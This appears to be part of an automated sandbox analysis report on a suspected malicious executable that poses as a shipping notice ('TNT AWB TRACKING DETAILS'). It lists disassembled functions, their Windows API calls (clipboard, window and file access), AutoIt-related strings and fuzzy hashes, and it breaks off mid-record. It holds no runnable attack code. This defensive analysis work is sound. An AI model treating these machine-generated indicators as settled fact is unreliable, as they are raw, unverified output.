                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                      • CopyRect.USER32(?,?), ref: 004568BE
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                      • String ID: ($,$tooltips_class32
                                      • API String ID: 225202481-3320066284
                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                      Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                      • CloseClipboard.USER32 ref: 0046DD0D
                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                      • CloseClipboard.USER32 ref: 0046DD41
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                      • CloseClipboard.USER32 ref: 0046DD99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                      • String ID:
                                      • API String ID: 15083398-0
                                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                      Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                                      • GetClientRect.USER32(?,?), ref: 00471D05
                                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                      • GetClientRect.USER32(?,?), ref: 00471E8A
                                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                      • String ID: @$AutoIt v3 GUI
                                      • API String ID: 867697134-3359773793
                                      • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                      • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                      Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 1503153545-1459072770
                                      • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                      • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                      • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                      • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                      Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                      • API String ID: 790654849-32604322
                                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                      Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                      • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                      Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                      • _fseek.LIBCMT ref: 00452B3B
                                      • __wsplitpath.LIBCMT ref: 00452B9B
                                      • _wcscpy.LIBCMT ref: 00452BB0
                                      • _wcscat.LIBCMT ref: 00452BC5
                                      • __wsplitpath.LIBCMT ref: 00452BEF
                                      • _wcscat.LIBCMT ref: 00452C07
                                      • _wcscat.LIBCMT ref: 00452C1C
                                      • __fread_nolock.LIBCMT ref: 00452C53
                                      • __fread_nolock.LIBCMT ref: 00452C64
                                      • __fread_nolock.LIBCMT ref: 00452C83
                                      • __fread_nolock.LIBCMT ref: 00452C94
                                      • __fread_nolock.LIBCMT ref: 00452CB5
                                      • __fread_nolock.LIBCMT ref: 00452CC6
                                      • __fread_nolock.LIBCMT ref: 00452CD7
                                      • __fread_nolock.LIBCMT ref: 00452CE8
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                      • __fread_nolock.LIBCMT ref: 00452D78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                      • String ID:
                                      • API String ID: 2054058615-0
                                      • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                      • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                      • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                      • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                      Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window
                                      • String ID: 0
                                      • API String ID: 2353593579-4108050209
                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                      Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                      • String ID:
                                      • API String ID: 1744303182-0
                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                      Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                      • __mtterm.LIBCMT ref: 00417C34
                                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                      • __init_pointers.LIBCMT ref: 00417CE6
                                      • __calloc_crt.LIBCMT ref: 00417D54
                                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 4163708885-3819984048
                                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                      Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: >>>AUTOIT SCRIPT<<<$\
                                      • API String ID: 0-1896584978
                                      • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                      • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                      • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                      • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                      Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2485277191-404129466
                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                      Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                      • GetDesktopWindow.USER32 ref: 0045476F
                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
